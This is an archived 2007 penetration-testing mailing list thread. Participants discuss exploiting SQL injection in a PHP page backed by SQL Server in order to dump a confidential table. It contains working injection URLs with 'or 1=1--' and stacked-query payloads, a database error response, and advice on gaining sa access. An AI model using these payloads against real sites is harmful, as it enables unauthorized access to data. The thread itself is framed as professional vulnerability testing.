RE: SQL Injection- Bypassing magic_quotes
- From: "Walsh, Leo" <Leo_Walsh@xxxxxxxxxxxxxxxxxx>
- Date: Thu, 11 Oct 2007 11:08:54 -0500
I think UNION requires columns of the same type. Do you have that type
of information? Do you happen to know (or can guess) what query is being
executed by mod.php? If you could share the query string you are using
to bypass magic_quotes and the results you get I might have some more
concrete ideas.
In raw SQL you can add a query at the WHERE level but it may be useless
to you. A very simple example that probably won't return the results you
want but you may catch my drift:
Select * from app_users
Where user id = 1 OR message in (select * from messages)
-Leo Walsh, GSNA
Jefferson Wells International
816-627-4222 (office)
913-484-8051 (cell)
-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of Danux
Sent: Wednesday, October 10, 2007 8:00 PM
To: pen-test@xxxxxxxxxxxxxxxxx
Subject: Re: SQL Injection- Bypassing magic_quotes
Good Leo, but sadly i have already taken those steps, the backend is a
SQL Server 2005 so xp_cmdshell and others are disabled. I only want to
print a confidential table in order to show up that its important to fix
it.
I think, the MSSQL connection handler is executed by the first mod.php
query so when trying to execute the second one it says the handlers is
already used, so ... i need a way to execute a second query through the
first one... with union or something like that or as Geoff said, a way
to stop executing the first query(mod.php) so that the connection
handler is not used and can execute the second one of mine (sql
injection).
What you think?
On 10/10/07, Walsh, Leo <Leo_Walsh@xxxxxxxxxxxxxxxxxx> wrote:
I would try a couple of things, if you haven't already.table.
1) If you aren't actually interested in the results that are obtained
from the query performed by mod.php then skip it. Your 1=1 selection
criteria might be eating up too much time. From the looks of your
query string it seems that can you bypass whatever filtering they are
doing without using 1=1.
2) Try selecting something much smaller than the entire messages
This is a table that might be quite large. Try selecting a single rowthat.
or message where date > somedate (which you may have to convert to a
binary value, by the way. If you know another table name then try
immediately.
3) Try using a SQL Injection tool to gain sa access. Depending on the
purpose of your investigation gaining sa should be enough to
demonstrate a severe vulnerability that should be mitigated
-Leo Walsh, GSNA
Jefferson Wells International
816-627-4222 (office)
913-484-8051 (cell)
-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx
[mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of Danux
Sent: Tuesday, October 09, 2007 7:25 PM
To: pen-test@xxxxxxxxxxxxxxxxx
Subject: Re: SQL Injection- Bypassing magic_quotes
Hi, well, after taking some examples from you (thanks in advance), i
am able to bypass single quotes son i can inject something simple as:
http://www.site.com/mod.php?id=1%27%20or%201=1--
But now, when trying to print a full table.... with the following
injection...:
http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20m
es
sages;--
there is a Warning saying that the Connecction is busy:
Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
SQL Server Driver]Connection is busy with results for another hstmt,
SQL state S1000 in SQLExecDirect in .........mod.php
So, i think i need a way to execute the second query (mine) before the
one that mod.php executes by itself (mod.php?id=1)
What you think?
----------------------------------------------------------------------
--
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
----------------------------------------------------------------------
--
******* Internet Email Confidentiality ******* The information
contained in this message may be privileged and confidential and
protected from disclosure. If the reader of this message is not the
intended recipient, or an employee or agent responsible for delivering
this message to the intended recipient, you are hereby notified that
it is strictly prohibited (a) to disseminate, distribute or copy this
communication or any of the information contained in it, or (b) to
take any action based on the information in it. If you have received
this communication in error, please notify us immediately by replying
to the message and deleting it from your computer.
--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
- Prev by Date: A little informal research
- Next by Date: Re: SQL Injection- Bypassing magic_quotes
- Previous by thread: Re: SQL Injection- Bypassing magic_quotes
- Next by thread: Re: SQL Injection- Bypassing magic_quotes
- Index(es):
Relevant Pages
|
